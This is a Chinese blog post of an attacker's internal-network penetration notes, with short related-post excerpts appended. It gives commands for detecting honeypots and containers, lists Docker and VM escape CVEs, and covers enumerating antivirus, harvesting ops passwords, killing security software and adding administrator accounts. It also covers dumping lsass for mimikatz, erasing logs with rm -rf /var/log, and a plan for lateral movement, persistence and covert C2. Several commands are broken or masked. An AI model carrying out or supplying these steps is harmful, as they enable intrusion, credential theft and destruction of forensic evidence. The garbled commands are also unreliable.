內網滲透自己的筆記

2021-10-25 03:14:34 字數 3728 閱讀 3947

拿到shell進入內網後雖然ms17010橫行但也是不能拿著掃瞄器到處掃的,每一步都應該小心謹慎,基本原則就是不要被扣分

所以首先在下認為應該判斷是否為虛擬機器,docker,蜜獾等

docker通常會有一些命令not find例如ifconfig uname-a 等

如果打著四面漏風的系統多半就是蜜獾了,而且裡面沒有正經的辦公痕跡的也很可疑

可以用如下方式識別一些簡單蜜獾

1.bof的識別;bof(back officer friendly)

2. 假**技術,關注honeypot hunter軟體;

3. honeyd的識別;

4. 利用sebek識別蜜網,第

二、三代蜜網都有這個軟體;

5. tarpits的識別;

6. 外聯資料控制識別,一般蜜罐會嚴格限制系統向外的流量;

7. 識別vmware虛擬機器,重點關注mac位址的範圍

8. 用nmap等scan工具,同乙個機器同時開放很多port的。

9. 因為很多蜜罐都設定在相同或臨近的網段。所以,同乙個網段(e.g. /24),很多機器都開放相同的port,回應相似的response。

10. 去shodan/censys查

vm虛擬機器為執行xchg ecx,eax 時間大於0xff時可以確定,上傳檢測小指令碼測試

//使用如下命令判斷docker

ls -alh .

/dockerenv

cat /proc/

1/cgroup

env \ path

//檢查是否有docker相關的環境變數

//ifconfig可以直接看到docker網絡卡,沒有ifconfig時檢視本機ip

cat /etc/hosts

//檢測vm虛擬機器

sudo dd if

=/dev/mem bs=

64k skip=

12 count=

1| string -n10 //會與物理機得到不一樣的輸出

docker逃逸

//常用方法

emote api 未授權訪問//2357埠

docker.sock掛載到容器內部

特權模式docker run --privileged

runc(cve

-2019

-5736)

dirty cow(cve

-2016

-5195)

vm逃逸

1、uaf漏洞,控制rip;

2、out-

of-bound read 漏洞。

3、out-

of-bound write 漏洞。和第二個漏洞合力起到洩露關鍵資訊的作用。

cve-

2015

-5165(乙個記憶體洩露漏洞)

cve-

2015

-7504(乙個堆溢位漏洞)

cve-

2017

-4901

cve-

2020

-4004

/5 只能想想,還沒poc

開始收集一些系統資訊

linux

set

+0 history //關閉記錄功能,結束後-o開啟

pa aux //顯示所有使用者的程序,檢視是什麼防火牆

chkconfig --list //檢視服務

systemctl status firewalld //檢視防火牆狀態

ifconfig -a //多半有域資訊

history //檢視敏感操作

for k in

$( seq 1

255)

;do ping -c 1

192.168

.99.$k|grep "ttl"

|awk -

f"[ :]+"

''; done //c段掃瞄

egrep expect /* -rl |grep 「.sh」 //遞迴查詢包含expect欄位的檔案,查運維用的密碼

find / -name "*.log" -exec rm -rvf {} \; //痕跡清理

rm -f -r /var/log //日誌清理

window

echo %

processor_architecture

%//系統體系結構

whoami && whoami /priv //當前使用者許可權

ipconfig /all //多半有域資訊

tasklist //window顯示程序

wmic /namespace:\\root\securitycenter2 path antivirusproduct get displayname,productstate, pathtosignedproductexe //顯示防毒軟體

taskkill //killwaf

wmic service list brief //顯示服務

tracert

-d -h ip //出網如果1跳就多半沒有流量監測與網路防護裝置

systeminfo //拿著補丁可以區bugs.hacking8.com/tiquan/ 查exp

net user 使用者名稱 密碼 /add //新增新使用者,需要administrator許可權

net localgroup administrators 使用者名稱 /add //把使用者提公升為管理員許可權,需要administrator許可權

net user /dom //盡量別用net user /domain別問我怎麼知道的

//持久控制

certutil -urlcache -split -f

lsass dump到本地再mimikatz抓取

for/l %i in(1

,1,255

)do @ping 192.168

.64.

%i -w 1

-n 1

|find /i "ttl="

//c段掃瞄

收集到系統資訊可以開始判斷當前系統是屬於什麼角色

檔案伺服器:配合社工,生成payload**到檔案伺服器公用檔案上,可批量上線主機

dns伺服器:埠53,可通過dns伺服器獲取內網web系統資訊,或者探測域資訊

dhcp伺服器:檢視內網多組網段資訊,更多的獲取拓補資訊

開發測試伺服器:獲取原始碼,新的資訊資產,多存在弱口令

**伺服器:獲取伺服器賬號,拿到各種密碼

web伺服器:可能需要提權

個人pc:檢視是否存在域環境

我的內網滲透思路

1.先隱蔽的收集資訊

2.列出環境中所有waf,殺軟等

3.找出系統的主要工作專案,制定可能有關聯的移動方向與魚叉思路,理清內網拓撲圖,網段.

4依次繞過或者暫時關閉waf,進行埠**,掃瞄內網,路由,交換機,埠等判斷是域還是組。

5.組的話,用常見 web 方法。

6.域的話 gpp,kerberos,****票據,抓密碼,

7.pth,ptk,spn 掃瞄,ipc,445,web 漏洞,各種未授權,密碼相同等.

8.進行埠**,連線msf,進一步ms17010等,ms14-068移動到域控

9.****進行持久控制

10.dns,域前置隱蔽c2

11.claerv和刪除路由表,web日誌,系統登入日誌,安全日誌

內網滲透 內網滲透測試基礎 1

內網也指區域網 local area network 是指在某一區域內由多台計算機互聯而成的計算機組,組網範圍通常在數千公尺以內。在區域網中,可以實現檔案管理 應用軟體共享 印表機共享 工作組內的日程安排 電子郵件和傳真通訊服務等。內網是封閉的,可以由辦公室內的兩台計算機組成,也可以由乙個公司內的大...

內網攻擊域滲透學習 筆記

有了內網的第一台機器的許可權後,就到了很關鍵的一步資訊收集,它也是內網滲透中不可或缺的一部分。檢視當前機器的網路環境,收集域裡的相關資訊,包括所有的使用者 所有的計算機,以及相關關鍵組的資訊。net user domain 檢視域使用者 net view domain 檢視有幾個域 net view...

再談內網滲透

前言 看了 g.r0b1n文章 內網滲透 抑制不住自己衝動的心情,寫一篇 再談內網滲透 希望以後有朋友能更新 詳談內網滲透 在我的腦子裡面我始終認為,一次滲透至少要控制被滲透物件80 以上伺服器才能算得上一次成功的滲透。希望朋友們能夠多提寶貴意見。正文 我沒有內網域裡面某個機器的許可權,我只有乙個存...